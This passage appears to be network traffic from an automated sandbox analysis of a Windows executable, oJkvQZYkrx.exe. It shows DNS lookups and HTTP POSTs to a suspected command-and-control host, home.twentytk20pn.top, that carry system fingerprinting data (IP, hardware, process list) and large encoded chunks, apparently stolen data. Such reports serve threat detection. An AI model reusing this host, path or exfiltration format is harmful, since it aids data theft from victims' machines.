                                                        Dec 20, 2024 16:49:47.068691015 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.068743944 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.068804026 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.068821907 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.068912983 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.068938971 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.068948984 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.069046974 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.069056988 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.069164038 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.069236994 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.069266081 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.069585085 CET4970580192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:47.186055899 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186105967 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186288118 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186306953 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186506987 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186526060 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186712980 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186724901 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186858892 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.186871052 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187002897 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187014103 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187077045 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187134027 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187155962 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187200069 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187246084 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187280893 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187331915 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187381029 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187463999 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187474012 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187592030 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187623024 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187710047 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187720060 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187809944 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187828064 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187882900 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.187948942 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188055992 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188095093 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188105106 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188113928 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188167095 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188185930 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188266039 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188275099 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188323021 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188370943 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188440084 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188477039 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188577890 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188585043 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188618898 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188649893 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188751936 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188783884 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188847065 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188889980 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.188982010 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189013958 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189150095 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189162970 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189266920 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189301968 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189414978 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189445019 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189551115 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189585924 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189694881 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189752102 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189762115 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189774036 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189879894 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.189889908 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190016985 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190036058 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190146923 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190181971 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190296888 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190306902 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190413952 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190424919 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190464020 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190495014 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190551996 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190562010 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190645933 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190655947 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190711021 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190737009 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190849066 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190859079 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190879107 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.190888882 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:47.191004992 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:48.127814054 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:48.127878904 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:48.127979994 CET4970580192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:48.128156900 CET4970580192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:48.247745037 CET8049705147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:48.956717968 CET4970680192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:49.076390982 CET8049706147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:49.076486111 CET4970680192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:49.076932907 CET4970680192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:49.196563005 CET8049706147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:50.743412971 CET8049706147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:50.743500948 CET8049706147.45.113.159192.168.2.8
                                                        Dec 20, 2024 16:49:50.743551970 CET4970680192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:50.743794918 CET4970680192.168.2.8147.45.113.159
                                                        Dec 20, 2024 16:49:50.863815069 CET8049706147.45.113.159192.168.2.8

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 20, 2024 16:49:41.778808117 CET6398153192.168.2.81.1.1.1
                                                        Dec 20, 2024 16:49:41.778861046 CET6398153192.168.2.81.1.1.1
                                                        Dec 20, 2024 16:49:41.915754080 CET53639811.1.1.1192.168.2.8
                                                        Dec 20, 2024 16:49:42.075515032 CET53639811.1.1.1192.168.2.8
                                                        Dec 20, 2024 16:49:45.013809919 CET6398453192.168.2.81.1.1.1
                                                        Dec 20, 2024 16:49:45.013871908 CET6398453192.168.2.81.1.1.1
                                                        Dec 20, 2024 16:49:45.315284967 CET53639841.1.1.1192.168.2.8
                                                        Dec 20, 2024 16:49:45.424799919 CET53639841.1.1.1192.168.2.8
                                                        Dec 20, 2024 16:49:48.809300900 CET6398653192.168.2.81.1.1.1
                                                        Dec 20, 2024 16:49:48.809469938 CET6398653192.168.2.81.1.1.1
                                                        Dec 20, 2024 16:49:48.948729038 CET53639861.1.1.1192.168.2.8
                                                        Dec 20, 2024 16:49:48.948748112 CET53639861.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 20, 2024 16:49:41.778808117 CET192.168.2.81.1.1.10x6762Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                        Dec 20, 2024 16:49:41.778861046 CET192.168.2.81.1.1.10x53aaStandard query (0)httpbin.org28IN (0x0001)false
                                                        Dec 20, 2024 16:49:45.013809919 CET192.168.2.81.1.1.10x2f66Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                        Dec 20, 2024 16:49:45.013871908 CET192.168.2.81.1.1.10xaf0dStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                        Dec 20, 2024 16:49:48.809300900 CET192.168.2.81.1.1.10x1384Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                        Dec 20, 2024 16:49:48.809469938 CET192.168.2.81.1.1.10x449aStandard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 20, 2024 16:49:42.075515032 CET1.1.1.1192.168.2.80x6762No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                        Dec 20, 2024 16:49:42.075515032 CET1.1.1.1192.168.2.80x6762No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                        Dec 20, 2024 16:49:45.424799919 CET1.1.1.1192.168.2.80x2f66No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                        Dec 20, 2024 16:49:48.948729038 CET1.1.1.1192.168.2.80x1384No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • httpbin.org
                                                        • home.twentytk20pn.top

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849705147.45.113.159805340C:\Users\user\Desktop\oJkvQZYkrx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:49:45.548533916 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                        Host: home.twentytk20pn.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 565286
                                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 37 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709782", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                        Dec 20, 2024 16:49:45.668318987 CET4944OUTData Raw: 54 5c 2f 65 50 2b 66 78 70 39 41 45 57 77 2b 33 2b 66 77 6f 32 48 32 5c 2f 7a 2b 46 66 73 46 34 6b 5c 2f 34 4a 4f 36 72 34 59 76 42 42 66 66 47 6e 7a 4c 4f 5a 79 74 6e 71 55 50 77 31 4c 57 74 79 4f 53 45 62 50 6a 37 39 78 64 42 51 54 4a 61 79 4d
                                                        Data Ascii: T\/eP+fxp9AEWw+3+fwo2H2\/z+FfsF4k\/4JO6r4YvBBffGnzLOZytnqUPw1LWtyOSEbPj79xdBQTJayMXXazRtNDsmela\/8EslucZ+O\/lk9v8AhWG7\/wB6Guece9fwfiP2mf0IsJXqYbE+NU6Fem7Tp1PDPxfjJdU1fgC0oyXvRnFuMotSi3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M2
                                                        Dec 20, 2024 16:49:45.668472052 CET4944OUTData Raw: 57 32 66 4a 73 38 7a 5a 35 76 6c 66 5a 5c 2f 77 44 6c 76 67 5c 2f 35 39 65 65 2b 61 50 38 41 56 37 45 33 5c 2f 77 43 72 69 75 4a 66 38 5c 2f 54 48 36 64 75 6c 50 2b 66 7a 48 5c 2f 35 5a 70 49 65 73 66 2b 46 44 5c 2f 77 42 31 50 6e 66 6d 58 5c 2f
                                                        Data Ascii: W2fJs8zZ5vlfZ\/wDlvg\/59ee+aP8AV7E3\/wCriuJf8\/TH6dulP+fzH\/5ZpIesf+FD\/wB1PnfmX\/WiD+Xv9aDQrIPLkfYh3nsPsvP2zn\/P+TRn95vdJEfNv5tx\/wAsMd\/6\/wCeKNqPv2J8lv8A9MvP5vOR\/n8afJv4d\/MTy4v9XHL\/AKn\/AD\/nNADGX92\/lv8A6uIy+X\/z2\/xH\/wCqmSSfMiP5af8Akf
                                                        Dec 20, 2024 16:49:45.668636084 CET2472OUTData Raw: 2b 46 50 42 5c 2f 69 62 77 66 34 55 2b 49 48 67 71 53 50 78 72 38 50 74 58 2b 49 57 68 61 6e 6f 58 78 43 31 66 34 63 61 37 71 44 70 70 2b 68 66 45 66 34 5a 61 68 59 61 76 59 61 68 38 4d 74 47 57 79 76 57 31 6d 2b 73 32 73 37 37 55 34 4a 39 4d 6b
                                                        Data Ascii: +FPB\/ibwf4U+IHgqSPxr8PtX+IWhanoXxC1f4ca7qDpp+hfEf4ZahYavYah8MtGWyvW1m+s2s77U4J9MknktLu0\/iQ\/4IuO0n\/BTT9m6RggaR\/jK7CONIkBb4BfFViEiiVI40BPyxxoqIMKiqoAH74fB79unwb4ssvi1Pb\/8ABWj\/AIWQvhT4a2fiO5uf+GDtV8H\/APCvYJvit8L\/AAsPG\/kv4Rtj4s+0XPia38Af
                                                        Dec 20, 2024 16:49:45.668719053 CET7416OUTData Raw: 6f 49 50 34 74 76 66 39 4f 75 4b 69 32 48 32 5c 2f 7a 2b 46 53 76 5c 2f 41 4b 77 5c 2f 37 6f 5c 2f 70 52 51 42 58 71 50 79 5c 2f 66 39 50 5c 2f 41 4b 39 57 58 36 66 6a 5c 2f 51 31 46 51 64 56 4c 70 5c 2f 68 5c 2f 79 4b 72 5c 2f 41 48 54 2b 48 38
                                                        Data Ascii: oIP4tvf9OuKi2H2\/z+FSv\/AKw\/7o\/pRQBXqPy\/f9P\/AK9WX6fj\/Q1FQdVLp\/h\/yKr\/AHT+H8xULfLnPb0q55fv+n\/16joNivTH6fj\/AENPZexH+fUVHJ2\/H+lB0EdR+X7\/AKf\/AF6kooNYbfP9EVWXd+FQ\/wDoH+fw6f5xVzy\/f9P\/AK9Vmj9vk\/kB\/njGfeg6ff8A7v4kMi4+\/wD8tPXtj\/P5Z9K
                                                        Dec 20, 2024 16:49:45.668883085 CET4944OUTData Raw: 71 4b 31 76 4c 6d 4f 43 61 49 54 53 62 76 76 43 76 6c 4d 72 79 36 70 67 38 4e 4b 6c 58 6d 6e 4e 31 36 6c 56 4f 68 56 72 52 6a 79 7a 70 30 6f 57 6c 62 32 54 6b 31 37 4e 74 58 54 35 62 33 69 37 74 6e 39 58 2b 45 6e 68 6c 6d 48 41 5c 2f 44 4f 4a 79
                                                        Data Ascii: qK1vLmOCaITSbvvCvlMry6pg8NKlXmnN16lVOhVrRjyzp0oWlb2Tk17NtXT5b3i7tn9X+EnhlmHA\/DOJyfiDGUq+MqZ7mGaUZZBm+d4bCLD43LcqwPs6\/IsqnXrQll9SUPbUKyw6nGeHqxqTqNfjJ+1f8Mf2iPhR\/wAEyv2kfDn7TH7UH\/DWXju98X+Ata0n4jf8KU8D\/Aj+xfCVz8SPg5Y2Hgr\/AIRHwBf6jo2o\/wBn
                                                        Dec 20, 2024 16:49:45.788042068 CET7416OUTData Raw: 48 2b 38 6b 38 76 5a 48 4d 6b 66 32 69 58 7a 54 2b 34 38 37 76 5c 2f 6a 6d 6e 79 5a 5c 2f 64 37 5c 2f 75 66 35 5c 2f 30 57 37 71 58 63 6e 33 4e 67 78 35 76 5c 2f 41 43 37 78 65 52 5c 2f 6e 4e 51 78 79 50 6a 2b 34 6b 66 38 41 71 76 33 31 31 5c 2f
                                                        Data Ascii: H+8k8vZHMkf2iXzT+487v\/jmnyZ\/d7\/uf5\/0W7qXcn3Ngx5v\/AC7xeR\/nNQxyPj+4kf8Aqv311\/4C\/rk0fH5W+e\/3djSn1+X6hJ+82b32eZFb+b+5\/T\/Hvx+NDSOmE\/j\/ANUJPN8\/\/PT8KfJ\/rE8n\/nlby\/aPNx+v\/wBeoZNnzO6eT+98r95\/nv8AXPFZmgzd5e9wg3+aP3f\/AD2+n8v88m15PnTzN
                                                        Dec 20, 2024 16:49:45.788084030 CET2472OUTData Raw: 2b 4b 5c 2f 78 65 30 2b 36 30 42 5c 2f 43 6e 77 66 30 66 52 39 61 38 51 77 58 75 74 78 57 4f 75 61 33 62 61 6c 48 64 61 68 71 4d 66 67 37 54 76 73 30 38 65 75 7a 2b 45 66 44 56 6a 66 65 4d 50 47 4b 4e 64 32 4b 36 48 34 5a 74 48 76 32 65 34 6d 6c
                                                        Data Ascii: +K\/xe0+60B\/Cnwf0fR9a8QwXutxWOua3balHdahqMfg7Tvs08euz+EfDVjfeMPGKNd2K6H4ZtHv2e4mltbW4\/c\/D3LfBXwZyrivC8OcRUMtwWFzDJa\/FLzrNqlWtleKzTD0KWTLGxxNOjUwNLF0sTT9nKpSjDnnUVWpF0akaX86+KGbeP3j1nXBmL4q4YxGbZhi8tz7CcHrIMmo0sPnGFyjFV62eLL54OrXpZjXwdbDz9p
                                                        Dec 20, 2024 16:49:45.788094044 CET2472OUTData Raw: 54 55 55 41 56 36 4b 66 73 50 74 5c 2f 6e 38 4b 61 56 4b 5c 2f 77 44 31 71 44 6f 45 71 76 56 69 6f 54 31 66 38 66 38 41 30 49 55 47 6c 50 72 38 76 31 47 31 58 71 78 52 51 61 46 54 62 38 32 65 33 58 38 66 38 38 5c 2f 70 55 56 57 35 46 2b 35 37 63
                                                        Data Ascii: TUUAV6KfsPt\/n8KaVK\/wD1qDoEqvVioT1f8f8A0IUGlPr8v1G1XqxRQaFTb82e3X8f88\/pUVW5F+57c\/XHFMoOgqv90\/h\/MVDVrY3p\/L\/GjY3p\/L\/Ggvnfl\/XzKGH9\/wA\/\/r0vl+\/6f\/XqxIr9h9P8ff26\/wA6joNSvRUr9Px\/oaZyh7cj\/PpQae08vx\/4BA\/X8KZVioth9v8AP4UHYVKY\/T8f6Gp
                                                        Dec 20, 2024 16:49:45.788208008 CET2472OUTData Raw: 5c 2f 4c 54 39 31 4c 31 35 5c 2f 36 65 76 72 36 66 34 55 66 49 56 2b 35 73 68 38 72 79 6f 70 49 35 66 38 41 55 5c 2f 36 58 7a 5c 2f 6e 50 72 55 33 37 34 4a 43 6e 33 33 75 4f 5c 2f 77 44 7a 31 37 5c 2f 35 5c 2f 77 41 61 41 47 52 79 62 57 6a 32 4a
                                                        Data Ascii: \/LT91L15\/6evr6f4UfIV+5sh8ryopI5f8AU\/6Xz\/nPrU374JCn33uO\/wDz17\/5\/wAaAGRybWj2J5r\/APPPr1\/z9c1Cu+ON3f5+nm\/uunpa\/wCfahm\/ef3f+2R8+bt7\/Q+v4UbnaJ0RN8n\/AC1\/69\/f\/PetPZ+f4f8ABNvf\/u\/iHlyHr9\/\/AJ6fh\/y946c1D5nyvvfe\/wDyxkcf6n\/J70EorN5Pl
                                                        Dec 20, 2024 16:49:45.829766035 CET27192OUTData Raw: 5a 62 34 79 65 70 52 76 49 33 4b 54 67 63 71 51 65 4b 39 57 72 39 45 48 4b 4b 2b 61 5a 54 6d 46 58 6a 48 4f 65 54 4b 63 78 7a 48 48 77 70 30 71 65 46 70 56 38 56 5c 2f 61 57 59 55 38 64 57 77 2b 4b 78 6e 73 4a 31 36 39 47 6d 71 63 61 4e 50 36 33
                                                        Data Ascii: Zb4yepRvI3KTgcqQeK9Wr9EHKK+aZTmFXjHOeTKcxzHHwp0qeFpV8V\/aWYU8dWw+KxnsJ169GmqcaNP63LGVqkIwlia9erRw1TD+HD6e+f0snzzLKPAHD0aud4TJcO61Wrjq1DL6mRZTjMqweIweEeKjSpYiax1XE169B4WcsRH20FCeKzJ4\/wAx8EfE\/wAMfDzwl8MPC\/ij4wfA3wD\/AMIF+3B8QPjb8X\/BfxF\/Zx8c
                                                        Dec 20, 2024 16:49:48.127814054 CET309INHTTP/1.1 502 Bad Gateway
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 20 Dec 2024 15:49:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.849706147.45.113.159805340C:\Users\user\Desktop\oJkvQZYkrx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:49:49.076932907 CET353OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                        Host: home.twentytk20pn.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 209
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
                                                        Dec 20, 2024 16:49:50.743412971 CET372INHTTP/1.1 404 NOT FOUND
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 20 Dec 2024 15:49:50 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 207
                                                        Connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
